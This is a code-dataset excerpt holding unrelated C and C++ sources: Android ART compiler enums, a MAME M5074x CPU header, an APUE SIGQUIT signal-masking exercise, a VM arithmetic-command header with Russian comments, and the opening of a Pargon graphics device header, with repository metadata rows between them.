// vC: TypeSize
kMirOpPackedSubtract,
// @brief Packed shift left of units in two vector registers: vB = vB .<< vC using vA to know the type of the vector.
// vA: destination and source
// vB: amount to shift
// vC: TypeSize
kMirOpPackedShiftLeft,
// @brief Packed signed shift right of units in two vector registers: vB = vB .>> vC using vA to know the type of the vector.
// vA: destination and source
// vB: amount to shift
// vC: TypeSize
kMirOpPackedSignedShiftRight,
// @brief Packed unsigned shift right of units in two vector registers: vB = vB .>>> vC using vA to know the type of the vector.
// vA: destination and source
// vB: amount to shift
// vC: TypeSize
kMirOpPackedUnsignedShiftRight,
// @brief Packed bitwise and of units in two vector registers: vB = vB .& vC using vA to know the type of the vector.
// vA: destination and source
// vB: source
// vC: TypeSize
kMirOpPackedAnd,
// @brief Packed bitwise or of units in two vector registers: vB = vB .| vC using vA to know the type of the vector.
// vA: destination and source
// vB: source
// vC: TypeSize
kMirOpPackedOr,
// @brief Packed bitwise xor of units in two vector registers: vB = vB .^ vC using vA to know the type of the vector.
// vA: destination and source
// vB: source
// vC: TypeSize
kMirOpPackedXor,
// @brief Reduce a 128-bit packed element into a single VR by taking lower bits
// @details Instruction does a horizontal addition of the packed elements and then adds it to VR
// vA: destination and source VR (not vector register)
// vB: source (vector register)
// vC: TypeSize
kMirOpPackedAddReduce,
// @brief Extract a packed element into a single VR.
// vA: destination VR (not vector register)
// vB: source (vector register)
// vC: TypeSize
// arg[0]: The index to use for extraction from vector register (which packed element)
kMirOpPackedReduce,
// @brief Create a vector value, with all TypeSize values equal to vC
// vA: destination vector register
// vB: source VR (not vector register)
// vC: TypeSize
kMirOpPackedSet,
// @brief Reserve a range of vector registers.
// vA: Start vector register to reserve.
// vB: Inclusive end vector register to reserve.
// @note: The backend may choose to map vector numbers used in vector opcodes.
// Reserved registers are removed from the list of backend temporary pool.
kMirOpReserveVectorRegisters,
// @brief Free a range of reserved vector registers
// vA: Start vector register to unreserve.
// vB: Inclusive end vector register to unreserve.
// @note: All currently reserved vector registers are returned to the temporary pool.
kMirOpReturnVectorRegisters,
// @brief Create a memory barrier.
// vA: a constant defined by enum MemBarrierKind.
kMirOpMemBarrier,
// @brief Used to fill a vector register with array values.
// @details Just as with normal arrays, access on null object register must ensure NullPointerException
// and invalid index must ensure ArrayIndexOutOfBoundsException. Exception behavior must be the same
// as the aget it replaced and must happen at same index. Therefore, it is generally recommended that
// before using this MIR, it is proven that exception is guaranteed to not be thrown and marked with
// MIR_IGNORE_NULL_CHECK and MIR_IGNORE_RANGE_CHECK.
// vA: destination vector register
// vB: array register
// vC: index register
// arg[0]: TypeSize (most other vector opcodes have this in vC)
kMirOpPackedArrayGet,
// @brief Used to store a vector register into array.
// @details Just as with normal arrays, access on null object register must ensure NullPointerException
// and invalid index must ensure ArrayIndexOutOfBoundsException. Exception behavior must be the same
// as the aget it replaced and must happen at same index. Therefore, it is generally recommended that
// before using this MIR, it is proven that exception is guaranteed to not be thrown and marked with
// MIR_IGNORE_NULL_CHECK and MIR_IGNORE_RANGE_CHECK.
// vA: source vector register
// vB: array register
// vC: index register
// arg[0]: TypeSize (most other vector opcodes have this in vC)
kMirOpPackedArrayPut,
// @brief Multiply-add integer.
// vA: destination
// vB: multiplicand
// vC: multiplier
// arg[0]: addend
kMirOpMaddInt,
// @brief Multiply-subtract integer.
// vA: destination
// vB: multiplicand
// vC: multiplier
// arg[0]: minuend
kMirOpMsubInt,
// @brief Multiply-add long.
// vA: destination
// vB: multiplicand
// vC: multiplier
// arg[0]: addend
kMirOpMaddLong,
// @brief Multiply-subtract long.
// vA: destination
// vB: multiplicand
// vC: multiplier
// arg[0]: minuend
kMirOpMsubLong,
kMirOpLast,
};
enum MIROptimizationFlagPositions {
kMIRIgnoreNullCheck = 0,
kMIRIgnoreRangeCheck,
kMIRIgnoreCheckCast,
kMIRStoreNonNullValue, // Storing non-null value, always mark GC card.
kMIRClassIsInitialized,
kMIRClassIsInDexCache,
kMirIgnoreDivZeroCheck,
kMIRInlined, // Invoke is inlined (ie dead).
kMIRInlinedPred, // Invoke is inlined via prediction.
kMIRCallee, // Instruction is inlined from callee.
kMIRIgnoreSuspendCheck,
kMIRDup,
kMIRMark, // Temporary node mark can be used by
// opt passes for their private needs.
kMIRStoreNonTemporal,
kMIRLastMIRFlag,
};
// For successor_block_list.
enum BlockListType {
kNotUsed = 0,
kCatch,
kPackedSwitch,
kSparseSwitch,
};
std::ostream& operator<<(std::ostream& os, const BlockListType& rhs);
enum AssemblerStatus {
kSuccess,
kRetryAll,
};
std::ostream& operator<<(std::ostream& os, const AssemblerStatus& rhs);
enum OpSize {
kWord, // Natural word size of target (32/64).
k32,
k64,
kReference, // Object reference; compressed on 64-bit targets.
kSingle,
kDouble,
kUnsignedHalf,
kSignedHalf,
kUnsignedByte,
kSignedByte,
};
std::ostream& operator<<(std::ostream& os, const OpSize& kind);
enum OpKind {
kOpMov,
kOpCmov,
kOpMvn,
kOpCmp,
kOpLsl,
kOpLsr,
kOpAsr,
kOpRor,
kOpNot,
kOpAnd,
kOpOr,
kOpXor,
kOpNeg,
kOpAdd,
kOpAdc,
kOpSub,
kOpSbc,
kOpRsub,
kOpMul,
kOpDiv,
kOpRem,
kOpBic,
kOpCmn,
kOpTst,
kOpRev,
kOpRevsh,
kOpBkpt,
kOpBlx,
kOpPush,
kOpPop,
kOp2Char,
kOp2Short,
kOp2Byte,
kOpCondBr,
kOpUncondBr,
kOpBx,
kOpInvalid,
};
std::ostream& operator<<(std::ostream& os, const OpKind& rhs);
enum MoveType {
kMov8GP, // Move 8-bit general purpose register.
kMov16GP, // Move 16-bit general purpose register.
kMov32GP, // Move 32-bit general purpose register.
kMov64GP, // Move 64-bit general purpose register.
kMov32FP, // Move 32-bit FP register.
kMov64FP, // Move 64-bit FP register.
kMovLo64FP, // Move low 32-bits of 64-bit FP register.
kMovHi64FP, // Move high 32-bits of 64-bit FP register.
kMovU128FP, // Move 128-bit FP register to/from possibly unaligned region.
kMov128FP = kMovU128FP,
kMovA128FP, // Move 128-bit FP register to/from region surely aligned to 16-bytes.
kMovLo128FP, // Move low 64-bits of 128-bit FP register.
kMovHi128FP, // Move high 64-bits of 128-bit FP register.
};
std::ostream& operator<<(std::ostream& os, const MoveType& kind);
enum ConditionCode {
kCondEq, // equal
kCondNe, // not equal
kCondCs, // carry set
kCondCc, // carry clear
kCondUlt, // unsigned less than
kCondUge, // unsigned greater than or same
kCondMi, // minus
kCondPl, // plus, positive or zero
kCondVs, // overflow
kCondVc, // no overflow
kCondHi, // unsigned greater than
kCondLs, // unsigned lower or same
kCondGe, // signed greater than or equal
kCondLt, // signed less than
kCondGt, // signed greater than
kCondLe, // signed less than or equal
kCondAl, // always
kCondNv, // never
};
std::ostream& operator<<(std::ostream& os, const ConditionCode& kind);
// Target specific condition encodings
enum ArmConditionCode {
kArmCondEq = 0x0, // 0000
kArmCondNe = 0x1, // 0001
kArmCondCs = 0x2, // 0010
kArmCondCc = 0x3, // 0011
kArmCondMi = 0x4, // 0100
kArmCondPl = 0x5, // 0101
kArmCondVs = 0x6, // 0110
kArmCondVc = 0x7, // 0111
kArmCondHi = 0x8, // 1000
kArmCondLs = 0x9, // 1001
kArmCondGe = 0xa, // 1010
kArmCondLt = 0xb, // 1011
kArmCondGt = 0xc, // 1100
kArmCondLe = 0xd, // 1101
kArmCondAl = 0xe, // 1110
kArmCondNv = 0xf, // 1111
};
std::ostream& operator<<(std::ostream& os, const ArmConditionCode& kind);
enum X86ConditionCode {
kX86CondO = 0x0, // overflow
kX86CondNo = 0x1, // not overflow
kX86CondB = 0x2, // below
kX86CondNae = kX86CondB, // not-above-equal
kX86CondC = kX86CondB, // carry
kX86CondNb = 0x3, // not-below
kX86CondAe = kX86CondNb, // above-equal
kX86CondNc = kX86CondNb, // not-carry
kX86CondZ = 0x4, // zero
kX86CondEq = kX86CondZ, // equal
kX86CondNz = 0x5, // not-zero
kX86CondNe = kX86CondNz, // not-equal
kX86CondBe = 0x6, // below-equal
kX86CondNa = kX86CondBe, // not-above
kX86CondNbe = 0x7, // not-below-equal
kX86CondA = kX86CondNbe, // above
kX86CondS = 0x8, // sign
kX86CondNs = 0x9, // not-sign
kX86CondP = 0xa, // 8-bit parity even
kX86CondPE = kX86CondP,
kX86CondNp = 0xb, // 8-bit parity odd
kX86CondPo = kX86CondNp,
kX86CondL = 0xc, // less-than
kX86CondNge = kX86CondL, // not-greater-equal
kX86CondNl = 0xd, // not-less-than
kX86CondGe = kX86CondNl, // not-greater-equal
kX86CondLe = 0xe, // less-than-equal
kX86CondNg = kX86CondLe, // not-greater
kX86CondNle = 0xf, // not-less-than
kX86CondG = kX86CondNle, // greater
};
std::ostream& operator<<(std::ostream& os, const X86ConditionCode& kind);
enum DividePattern {
DivideNone,
Divide3,
Divide5,
Divide7,
};
std::ostream& operator<<(std::ostream& os, const DividePattern& pattern);
/**
* @brief Memory barrier types (see "The JSR-133 Cookbook for Compiler Writers").
* @details We define the combined barrier types that are actually required
* by the Java Memory Model, rather than using exactly the terminology from
* the JSR-133 cookbook. These should, in many cases, be replaced by acquire/release
* primitives. Note that the JSR-133 cookbook generally does not deal with
* store atomicity issues, and the recipes there are not always entirely sufficient.
* The current recipe is as follows:
* -# Use AnyStore ~= (LoadStore | StoreStore) ~= release barrier before volatile store.
* -# Use AnyAny barrier after volatile store. (StoreLoad is as expensive.)
* -# Use LoadAny barrier ~= (LoadLoad | LoadStore) ~= acquire barrier after each volatile load.
* -# Use StoreStore barrier after all stores but before return from any constructor whose
* class has final fields.
* -# Use NTStoreStore to order non-temporal stores with respect to all later
* store-to-memory instructions. Only generated together with non-temporal stores.
*/
enum MemBarrierKind {
kAnyStore,
kLoadAny,
kStoreStore,
kAnyAny,
kNTStoreStore,
};
std::ostream& operator<<(std::ostream& os, const MemBarrierKind& kind);
enum OpFeatureFlags {
kIsBranch = 0,
kNoOperand,
kIsUnaryOp,
kIsBinaryOp,
kIsTertiaryOp,
kIsQuadOp,
kIsQuinOp,
kIsSextupleOp,
kIsIT,
kIsMoveOp,
kMemLoad,
kMemStore,
kMemVolatile,
kMemScaledx0,
kMemScaledx2,
kMemScaledx4,
kPCRelFixup, // x86 FIXME: add NEEDS_FIXUP to instruction attributes.
kRegDef0,
kRegDef1,
kRegDef2,
kRegDefA,
kRegDefD,
kRegDefFPCSList0,
kRegDefFPCSList2,
kRegDefList0,
kRegDefList1,
kRegDefList2,
kRegDefLR,
kRegDefSP,
kRegUse0,
kRegUse1,
kRegUse2,
kRegUse3,
kRegUse4,
kRegUseA,
kRegUseC,
kRegUseD,
kRegUseB,
kRegUseFPCSList0,
kRegUseFPCSList2,
kRegUseList0,
kRegUseList1,
kRegUseLR,
kRegUsePC,
kRegUseSP,
kSetsCCodes,
kUsesCCodes,
kUseFpStack,
kUseHi,
kUseLo,
kDefHi,
kDefLo
};
std::ostream& operator<<(std::ostream& os, const OpFeatureFlags& rhs);
enum SelectInstructionKind {
kSelectNone,
kSelectConst,
kSelectMove,
kSelectGoto
};
std::ostream& operator<<(std::ostream& os, const SelectInstructionKind& kind);
// LIR fixup kinds for Arm and X86.
enum FixupKind {
kFixupNone,
kFixupLabel, // For labels we just adjust the offset.
kFixupLoad, // Mostly for immediates.
kFixupVLoad, // FP load which *may* be pc-relative.
kFixupCBxZ, // Cbz, Cbnz.
kFixupTBxZ, // Tbz, Tbnz.
kFixupCondBranch, // Conditional branch
kFixupT1Branch, // Thumb1 Unconditional branch
kFixupT2Branch, // Thumb2 Unconditional branch
kFixupBlx1, // Blx1 (start of Blx1/Blx2 pair).
kFixupBl1, // Bl1 (start of Bl1/Bl2 pair).
kFixupAdr, // Adr.
kFixupMovImmLST, // kThumb2MovImm16LST.
kFixupMovImmHST, // kThumb2MovImm16HST.
kFixupAlign4, // Align to 4-byte boundary.
kFixupA53Erratum835769, // Cortex A53 Erratum 835769.
kFixupSwitchTable, // X86_64 packed switch table.
};
std::ostream& operator<<(std::ostream& os, const FixupKind& kind);
enum VolatileKind {
kNotVolatile, // Load/Store is not volatile
kVolatile // Load/Store is volatile
};
std::ostream& operator<<(std::ostream& os, const VolatileKind& kind);
enum WideKind {
kNotWide, // Non-wide view
kWide, // Wide view
kRef // Ref width
};
std::ostream& operator<<(std::ostream& os, const WideKind& kind);
} // namespace art
#endif // ART_COMPILER_DEX_COMPILER_ENUMS_H_
| 29.419498 | 130 | 0.692323 |
b7ce310bd6e11e63b7d1522e4a217f01bed7d36f | 4,461 | h | C | src/devices/cpu/m6502/m5074x.h | Robbbert/messui | 49b756e2140d8831bc81335298ee8c5471045e79 | [
"BSD-3-Clause"
] | 26 | 2015-03-31T06:25:51.000Z | 2021-12-14T09:29:04.000Z | src/devices/cpu/m6502/m5074x.h | Robbbert/messui | 49b756e2140d8831bc81335298ee8c5471045e79 | [
"BSD-3-Clause"
] | null | null | null | src/devices/cpu/m6502/m5074x.h | Robbbert/messui | 49b756e2140d8831bc81335298ee8c5471045e79 | [
"BSD-3-Clause"
] | 10 | 2015-03-27T05:45:51.000Z | 2022-02-04T06:57:36.000Z | // license:BSD-3-Clause
// copyright-holders:Olivier Galibert
#ifndef MAME_CPU_M6502_M5074X_H
#define MAME_CPU_M6502_M5074X_H
#pragma once
#include "m740.h"
//**************************************************************************
// TYPE DEFINITIONS
//**************************************************************************
// ======================> m5074x_device
class m5074x_device : public m740_device
{
friend class m50740_device;
friend class m50741_device;
friend class m50753_device;
enum
{
M5074X_INT1_LINE = INPUT_LINE_IRQ0
};
enum
{
TIMER_1 = 0,
TIMER_2,
TIMER_X,
TIMER_ADC,
NUM_TIMERS
};
public:
const address_space_config m_program_config;
template <std::size_t Bit> auto read_p() { return m_read_p[Bit].bind(); }
template <std::size_t Bit> auto write_p() { return m_write_p[Bit].bind(); }
template <std::size_t Bit> void set_pullups(u8 mask) { m_pullups[Bit] = mask; }
uint8_t ports_r(offs_t offset);
void ports_w(offs_t offset, uint8_t data);
uint8_t tmrirq_r(offs_t offset);
void tmrirq_w(offs_t offset, uint8_t data);
bool are_port_bits_output(uint8_t port, uint8_t mask) { return ((m_ddrs[port] & mask) == mask) ? true : false; }
protected:
// construction/destruction
m5074x_device(const machine_config &mconfig, device_type type, const char *tag, device_t *owner, uint32_t clock, int addrbits, address_map_constructor internal_map);
// device-level overrides
virtual void device_start() override;
virtual void device_reset() override;
virtual void device_timer(emu_timer &timer, device_timer_id id, int param, void *ptr) override;
virtual space_config_vector memory_space_config() const override;
// device_execute_interface overrides (TODO: /8 in M50740A/41/52/57/58 SLW mode)
virtual uint64_t execute_clocks_to_cycles(uint64_t clocks) const noexcept override { return (clocks + 4 - 1) / 4; }
virtual uint64_t execute_cycles_to_clocks(uint64_t cycles) const noexcept override { return (cycles * 4); }
virtual void execute_set_input(int inputnum, int state) override;
void send_port(uint8_t offset, uint8_t data);
uint8_t read_port(uint8_t offset);
void recalc_irqs();
void recalc_timer(int timer);
devcb_read8::array<5> m_read_p;
devcb_write8::array<5> m_write_p;
uint8_t m_ports[5], m_ddrs[5], m_pullups[5];
uint8_t m_intctrl, m_tmrctrl;
uint8_t m_tmr12pre, m_tmr1, m_tmr2, m_tmrxpre, m_tmrx;
uint8_t m_tmr1latch, m_tmr2latch, m_tmrxlatch;
uint8_t m_last_all_ints;
private:
emu_timer *m_timers[NUM_TIMERS];
};
class m50740_device : public m5074x_device
{
public:
m50740_device(const machine_config &mconfig, const char *tag, device_t *owner, uint32_t clock);
protected:
m50740_device(const machine_config &mconfig, device_type type, const char *tag, device_t *owner, uint32_t clock);
private:
void m50740_map(address_map &map);
};
class m50741_device : public m5074x_device
{
public:
m50741_device(const machine_config &mconfig, const char *tag, device_t *owner, uint32_t clock);
protected:
m50741_device(const machine_config &mconfig, device_type type, const char *tag, device_t *owner, uint32_t clock);
private:
void m50741_map(address_map &map);
};
class m50753_device : public m5074x_device
{
public:
m50753_device(const machine_config &mconfig, const char *tag, device_t *owner, uint32_t clock);
enum
{
M50753_INT1_LINE = INPUT_LINE_IRQ0,
M50753_INT2_LINE = INPUT_LINE_IRQ1
};
template <std::size_t Bit> auto ad_in() { return m_ad_in[Bit].bind(); }
auto read_in_p() { return m_in_p.bind(); }
protected:
m50753_device(const machine_config &mconfig, device_type type, const char *tag, device_t *owner, uint32_t clock);
// device-level overrides
virtual void device_start() override;
virtual void device_reset() override;
virtual void device_timer(emu_timer &timer, device_timer_id id, int param, void *ptr) override;
virtual void execute_set_input(int inputnum, int state) override;
private:
void m50753_map(address_map &map);
uint8_t ad_r();
uint8_t in_r();
void ad_start_w(uint8_t data);
uint8_t ad_control_r();
void ad_control_w(uint8_t data);
void ad_trigger_w(uint8_t data);
uint8_t pwm_control_r();
void pwm_control_w(uint8_t data);
devcb_read8::array<8> m_ad_in;
devcb_read8 m_in_p;
uint8_t m_ad_control;
bool m_pwm_enabled;
};
DECLARE_DEVICE_TYPE(M50740, m50740_device)
DECLARE_DEVICE_TYPE(M50741, m50741_device)
DECLARE_DEVICE_TYPE(M50753, m50753_device)
#endif // MAME_CPU_M6502_M5074X_H
| 28.056604 | 166 | 0.73952 |
ec66551c5f1bff6a3a6ac4c104d54eeb2c8fcbf2 | 978 | c | C | c10/10-15.c | fATwaer/APUE | 148c4aaba9d61e00e11dfb86e2e5bfedd700fe0a | [
"MIT"
] | 4 | 2018-10-20T15:01:36.000Z | 2020-09-09T17:21:37.000Z | c10/10-15.c | fATwaer/APUE | 148c4aaba9d61e00e11dfb86e2e5bfedd700fe0a | [
"MIT"
] | null | null | null | c10/10-15.c | fATwaer/APUE | 148c4aaba9d61e00e11dfb86e2e5bfedd700fe0a | [
"MIT"
] | null | null | null | #include "apue.h"
#include <errno.h>
#include <sys/wait.h>
#include <signal.h>
static void sig_quit(int);
//# SIGQUIT is gernerated by ctrl + \
int
main()
{
sigset_t newmask, oldmask, pendmask;
if (signal(SIGQUIT, sig_quit) == SIG_ERR)
err_sys("can't catch SIGQUIT");
/* block sigquit */
sigemptyset(&newmask);
sigaddset(&newmask, SIGQUIT);
if (sigprocmask(SIG_BLOCK, &newmask, &oldmask) < 0)
err_sys("SIG_BLOCK error");
sleep(5);
if (sigpending(&pendmask) < 0)
err_sys("sigpending error");
if (sigismember(&pendmask, SIGQUIT))
printf("\nSIGQUIT pending\n");
// restore signal mask
if (sigprocmask(SIG_SETMASK, &oldmask, NULL) < 0)
err_sys("SIG_SETMAKS error");
printf("SIGQUIT unblocked\n");
sleep(5);
exit(0);
}
static void
sig_quit(int signo)
{
printf("caught SIGQUIT\n");
if (signal(SIGQUIT, SIG_DFL) == SIG_ERR)
err_sys("can't reset SIGQUIT");
}
| 18.807692 | 55 | 0.621677 |
6488971d3fe3c9e51ab5a3dfb3f13b90f7ec6052 | 7,413 | h | C | src/commands/Arithmetic.h | vany152/VM5 | ef25328dae8eebdfe73c8ea427042ad45e311f91 | [
"MIT"
] | null | null | null | src/commands/Arithmetic.h | vany152/VM5 | ef25328dae8eebdfe73c8ea427042ad45e311f91 | [
"MIT"
] | null | null | null | src/commands/Arithmetic.h | vany152/VM5 | ef25328dae8eebdfe73c8ea427042ad45e311f91 | [
"MIT"
] | null | null | null | #ifndef ARCHITECTURY_ARITHMETIC_H
#define ARCHITECTURY_ARITHMETIC_H
#include "Command.h"
/**
* @brief базовый класс для арифметических команд
*/
struct Arithmetic : public Command {};
/** **************************************************** INTEGER *************************************************** **/
/**
* @brief базовый класс для арифметических операций с целыми числами
*/
struct IntegerArithmetic : public Arithmetic
{
virtual void operator()(CPU & cpu);
/**
* @brief вычисление результата операции
* @param cpu процессор (просматривается PSW)
* @param first первый операнд
* @param second второй операнд
*/
virtual uint64_t calculate(const CPU & cpu, const uint64_t & first, const uint64_t & second) = 0;
/**
* @brief устанавливает флаги PSW по операндам и результату операции
* @param operandSize размер операнда в байтах (чтобы каждый раз его не высчитывать)
* @param cpu процессор, psw которого рассматривается
* @param op1 первый операнд
* @param op2 второй операнд
* @param result результат операции
*/
virtual void setFlags(
CPU & cpu,
const size_t & operandSize,
const uint64_t & op1,
const uint64_t & op2,
const uint64_t & result
) noexcept;
};
/**
* @brief целочисленное сложение
* @details складывает операнды и выставляет флаги SF, ZF, CF, OF.\n
* формат команды в файле с записью программы: t opcode s r1 r2.\n
* операнды - целые числа.
*/
struct add final : public IntegerArithmetic
{
virtual uint64_t calculate(const CPU & cpu, const uint64_t & first, const uint64_t & second) noexcept;
};
/**
* @brief целочисленное сложение с учетом CF
* @details складывает два числа и CF и выставляет флаги SF, ZF, CF, OF.\n
* формат команды в файле с записью программы: t opcode s r1 r2.\n
* операнды - целые числа.
*/
struct adc final : public IntegerArithmetic
{
virtual uint64_t calculate(const CPU & cpu, const uint64_t & first, const uint64_t & second) noexcept;
};
/**
* @brief целочисленный инкремент
* @details увеличивает операнд (целое число) на один и выставляет флаги SF, ZF, OF.\n
* формат команды в файле с записью программы: t opcode s r1 15.\n
* операнды - целые числа.
*/
struct inc final : public IntegerArithmetic
{
virtual uint64_t calculate(const CPU & cpu, const uint64_t & first, const uint64_t & second) noexcept;
};
/**
* @brief целочисленное вычитание
* @details вычитает второй операнд из первого выставляет флаги SF, ZF, CF, OF.\n
* формат команды в файле с записью программы: t opcode s r1 r2.\n
* операнды - целые числа.
*/
struct sub final : public IntegerArithmetic
{
virtual uint64_t calculate(const CPU & cpu, const uint64_t & first, const uint64_t & second) noexcept;
};
/**
* @brief целочисленное вычитание с учетом CF
* @details вычитает второй операнд и CF из первого выставляет флаги SF, ZF, CF, OF.\n
* формат команды в файле с записью программы: t opcode s r1 r2.\n
* операнды - целые числа.
*/
struct sbb final : public IntegerArithmetic
{
virtual uint64_t calculate(const CPU & cpu, const uint64_t & first, const uint64_t & second) noexcept;
};
/**
* @brief целочисленный декремент
* @details уменьшает первый операнд (целое число) на один и выставляет флаги SF, ZF, OF.\n
* формат команды в файле с записью программы: t opcode s r1 15.\n
* операнды - целые числа.
*/
struct dec final : public IntegerArithmetic
{
virtual uint64_t calculate(const CPU & cpu, const uint64_t & first, const uint64_t & second) noexcept;
};
/**
* @brief целочисленное беззнаковое умножение
* @details умножает первый операнд на второй и выставляет флаг CF.\n
* формат команды в файле с записью программы: t opcode s r1 r2.\n
* операнды - целые беззнаковые числа.
*/
struct mul final : public IntegerArithmetic
{
virtual uint64_t calculate(const CPU & cpu, const uint64_t & first, const uint64_t & second) noexcept;
virtual void setFlags(
CPU & cpu,
const size_t & operandSize,
const uint64_t & op1,
const uint64_t & op2,
const uint64_t & result
) noexcept;
};
/**
* @brief целочисленное знаковое умножение
* @details умножает первый операнд на второй и выставляет флаг OF.\n
* формат команды в файле с записью программы: t opcode s r1 r2.\n
* операнды - целые знаковые числа.
*/
struct imul final : public IntegerArithmetic
{
virtual uint64_t calculate(const CPU & cpu, const uint64_t & first, const uint64_t & second) noexcept;
virtual void setFlags(
CPU & cpu,
const size_t & operandSize,
const uint64_t & op1,
const uint64_t & op2,
const uint64_t & result
) noexcept;
};
/**
* @brief целочисленное беззнаковое деление
* @details делит первый операнд на второй, выставляет флаг ZF\n
* формат команды в файле с записью программы: t opcode s r1 r2.\n
* операнды - целые знаковые числа.
*/
struct div final : public IntegerArithmetic
{
virtual uint64_t calculate(const CPU & cpu, const uint64_t & first, const uint64_t & second);
};
/**
* @brief целочисленное знаковое деление
* @details делит первый операнд на второй, выставляет флаги ZF, SF\n
* формат команды в файле с записью программы: t opcode s r1 r2.\n
* операнды - целые знаковые числа.
*/
struct idiv final : public IntegerArithmetic
{
virtual uint64_t calculate(const CPU & cpu, const uint64_t & first, const uint64_t & second);
};
/** ***************************************************** FLOAT **************************************************** **/
/**
* @brief базовый класс для арифметических команд с вещественными числами
*/
struct RealArithmetic : public Arithmetic
{
virtual void operator()(CPU & cpu) noexcept;
/**
* @brief вычисление результата операции
* @param first первый операнд
* @param second второй операнд
*/
virtual float calculate(const float & first, const float & second) = 0;
/**
* @brief устанавливает флаги PSW по результату операции
* @param cpu процессор, psw которого рассматривается
* @param result результат операции
*/
virtual void setFlags(CPU & cpu, const float & result) noexcept;
};
/**
* @brief вещественное сложение
* @details складывает операнды и выставляет флаги SF, ZF, OF\n
* формат команды в файле с записью программы: t opcode 1 r1 r2.\n
* операнды - вещественные числа.
*/
struct radd final : public RealArithmetic
{
virtual float calculate(const float & first, const float & second) noexcept;
};
/**
* @brief вещественное вычитание
* @details вычитает второй операнд из первого и выставляет флаги SF, ZF, OF\n
* формат команды в файле с записью программы: t opcode 1 r1 r2.\n
* операнды - вещественные числа.
*/
struct rsub final : public RealArithmetic
{
virtual float calculate(const float & first, const float & second) noexcept;
};
/**
* @brief вещественное умножение
* @details умножает операнды и выставляет флаги SF, ZF, OF\n
* формат команды в файле с записью программы: t opcode 1 r1 r2.\n
* операнды - вещественные числа.
*/
struct rmul final : public RealArithmetic
{
virtual float calculate(const float & first, const float & second) noexcept;
};
/**
* @brief вещественное деление
* @details делит первый операнд на второй и выставляет флаги SF, OF\n
* формат команды в файле с записью программы: t opcode 1 r1 r2.\n
* операнды - вещественные числа.
*/
struct rdiv final : public RealArithmetic
{
virtual float calculate(const float & first, const float & second) noexcept;
};
#endif //ARCHITECTURY_ARITHMETIC_H
| 31.147059 | 120 | 0.703629 |
2357862d5d2bb29eb3acd98ee0d523183189add4 | 3,116 | h | C | components/services/heap_profiling/json_exporter.h | zipated/src | 2b8388091c71e442910a21ada3d97ae8bc1845d3 | [
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | components/services/heap_profiling/json_exporter.h | cangulcan/src | 2b8388091c71e442910a21ada3d97ae8bc1845d3 | [
"BSD-3-Clause"
] | 395 | 2020-04-18T08:22:18.000Z | 2021-12-08T13:04:49.000Z | components/services/heap_profiling/json_exporter.h | cangulcan/src | 2b8388091c71e442910a21ada3d97ae8bc1845d3 | [
"BSD-3-Clause"
] | 338 | 2020-04-18T08:03:10.000Z | 2022-03-29T12:33:22.000Z | // Copyright 2017 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef COMPONENTS_SERVICES_HEAP_PROFILING_JSON_EXPORTER_H_
#define COMPONENTS_SERVICES_HEAP_PROFILING_JSON_EXPORTER_H_
#include <iosfwd>
#include <vector>
#include "base/values.h"
#include "components/services/heap_profiling/allocation_event.h"
#include "components/services/heap_profiling/public/cpp/stream.h"
#include "components/services/heap_profiling/public/mojom/heap_profiling_service.mojom.h"
#include "services/resource_coordinator/public/mojom/memory_instrumentation/memory_instrumentation.mojom.h"
namespace heap_profiling {
// Configuration passed to the export functions because they take many
// arguments. All parameters must be set.
struct ExportParams {
ExportParams();
~ExportParams();
// Allocation events to export.
AllocationCountMap allocs;
// VM map of all regions in the process.
std::vector<memory_instrumentation::mojom::VmRegionPtr> maps;
// Map from context string to context ID. A reverse-mapping will tell you
// what the context_id in the allocation mean.
std::map<std::string, int> context_map;
// Some addresses represent strings rather than instruction pointers.
// The strings are assumed to already be escaped for JSON.
std::unordered_map<uint64_t, std::string> mapped_strings;
// The type of browser [browser, renderer, gpu] that is being heap-dumped.
mojom::ProcessType process_type = mojom::ProcessType::OTHER;
// Only allocations exceeding this size or count will be exported.
size_t min_size_threshold = 0;
size_t min_count_threshold = 0;
// Whether or not the paths should be stripped from mapped files. Doing so
// anonymizes the trace, since the paths could potentially contain a username.
// However, it prevents symbolization of locally built instances of Chrome.
bool strip_path_from_mapped_files = false;
// The heaps_v2 trace format requires that ids are unique across heap dumps in
// a single trace. This class is currently stateless, and does not know
// whether a heap dump will be in a trace with other heap dumps. To work
// around this, just make all IDs unique. The parameter is an input parameter
// that tells the exporter which ID to start from. It is also an output
// parameter, and tells the caller the next unused ID.
// See https://crbug.com/808066.
size_t next_id = 1;
// When sampling is enabled, each allocation is recorded with probability
// (size / sampling_rate). The resulting exported JSON needs to be
// appropriately updated to reflect de-sampled values.
// A |sampling_rate| of 1 is equivalent to recording all allocations.
size_t sampling_rate = 1;
};
// Creates a JSON string representing a JSON dictionary that contains memory
// maps and v2 format stack traces.
void ExportMemoryMapsAndV2StackTraceToJSON(ExportParams* params,
std::ostream& out);
} // namespace heap_profiling
#endif // COMPONENTS_SERVICES_HEAP_PROFILING_JSON_EXPORTER_H_
| 41.546667 | 107 | 0.7638 |
ea813686722be4b74a90d26e841ddf4b564517a6 | 6,132 | h | C | Modules/Graphics/Include/Pargon/Graphics/GraphicsDevice.h | larsoad/pargon-framework | 0f616c889c329d66ea89a6358ccb0ce1efe13c41 | [
"MIT"
] | null | null | null | Modules/Graphics/Include/Pargon/Graphics/GraphicsDevice.h | larsoad/pargon-framework | 0f616c889c329d66ea89a6358ccb0ce1efe13c41 | [
"MIT"
] | null | null | null | Modules/Graphics/Include/Pargon/Graphics/GraphicsDevice.h | larsoad/pargon-framework | 0f616c889c329d66ea89a6358ccb0ce1efe13c41 | [
"MIT"
] | null | null | null | #pragma once
#include "Pargon/Application/Application.h"
#include "Pargon/Containers/Map.h"
#include "Pargon/Graphics/Geometry.h"
#include "Pargon/Graphics/GraphicsResource.h"
#include "Pargon/Graphics/Material.h"
#include "Pargon/Graphics/Renderer.h"
#include "Pargon/Graphics/Texture.h"
#include "Pargon/Types/Color.h"
#include <memory>
#include <mutex>
namespace Pargon
{
class Color;
class GraphicsDevice
{
public:
static constexpr TextureId BackBuffer = {};
static constexpr float DefaultDepthClear = 1.0f;
static constexpr int DefaultStencilClear = 0;
static constexpr float ClipNone = -1.0f;
static constexpr int DrawAll = 0;
static constexpr std::size_t ActualSize = 0;
static constexpr int NoSynchronization = 0;
static constexpr int VSync = 1;
auto Renderer() const -> Renderer*;
auto Geometries() const -> SequenceView<std::unique_ptr<Geometry>>;
